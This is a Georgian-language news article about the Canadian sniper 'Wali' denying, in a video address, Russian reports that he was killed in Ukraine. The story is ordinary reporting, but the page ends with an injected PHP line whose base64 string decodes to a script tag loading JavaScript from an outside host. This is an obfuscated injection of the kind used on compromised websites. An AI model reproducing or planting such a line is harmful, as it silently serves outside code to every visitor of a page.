celsiusi
ავერსი შნაიდერი
კანადის შეიარაღებული ძალების ყოფილი მებრძოლი და მსოფლიოში ერთ-ერთი საუკეთესო სნაიპერი მეტსახელად „ვალი“ ვიდეომიმართვას ავრცელებს და აცხადებს, რომ ინფორმაცია მისი სიკვდილის შესახებ რუსეთის მიერ გავრცელებული პროპაგანდაა. სპეციალური ვიდეომიმართვა CBC News-მა გაავრცელა.
 
როგორც სნაიპერმა განაცხადა, ერთი კვირის მანძილზე ის ბრძოლის წინა ხაზზე იმყოფებოდა, როდესაც უკან დაბრუნდა და მობილური ტელეფონი ჩართო, მისი გარდაცვალების შესახებ ინფორმაცია წაიკითხა და გადაწყვიტა ვიდეომიმართვა ჩაეწერა.
 
"ჩემი გარდაცვალების შესახებ ყველაზე ბოლოს სატელეფონო ჩართვით გავიგე. ორი რამ დანამდვილებით ვიცი - ის, რომ რუსეთი შეიჭრა უკრაინაში და ის რომ ხალხს მე დაღუპული ვგონივარ. საინტერესოა, რომ "ტროლინგი" მიმდინარეობს და ახლაც რომ მაქვს თქვენთან ინტერვიუ, იტყვიან რომ ყალბია. რომ სურათებიც გაყალბებულია, ვფიქრობ რომ ეს ბავშვური სამხედრო პროპაგანდაა. არ არის ჭკვიანური, რადგან მალე ნდობას დაკარგავენ, თუ ასეთ აშკარა ტყუილების თქმას განაგრძობენ.
 
მნიშვნელობა არ აქვს ავღანეთი იქნება, თურქმენეთი თუ უკრაინა, თუ ადამიანებს დახმარება სჭირდებათ და მე ეს შემიძლია, მე მათ დავეხმარები. მესმის რომ მყავს ოჯახი, შვილი, ჩემი შვილის პირველ დაბადების დღეზე ფრონტის წინა ხაზზე ვიდექი. თუ ჩვენ გვწამს თავისუფლებისა და მშვიდობის, ჩვენ ყველამ უნდა მოვიმოქმედოთ.
 
რუსები არ არიან გამოცდილი მებრძოლები, არმიაც არ არის. არ ვამბობ, რომ ყველა ცუდია, მათი შესაძლებლობები ეჭვქვეშ არ უნდა დავაყენოთ, მაგრამ ისინი არ არიან ისეთი კარგები, როგორც NATO-ს არმია. მე უფრო შემეშინდებოდა კანადელი მებრძოლის, თავისი თვითმფრინავებითა და ტანკებით, ვიდრე რუსი მებრძოლების, თუნდაც მათი რაოდენობა სჭარბობდეს,"- აცხადებს "ვალი".
 
ცნობისთვის, კანადელი სნაიპერი უკრაინაში დაახლოებით 10 დღის წინ ჩავიდა. ის მანამდე ერაყსა და ავღანეთში იბრძოდა. რუსული მედიასაშუალებები ბოლო რამდენიმე დღეა აცხადებდნენ, რომ სნაიპერი „ვალი“ უკრიანაში რუსმა სამხედროებმა მოკლეს. 
 
 
1076
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");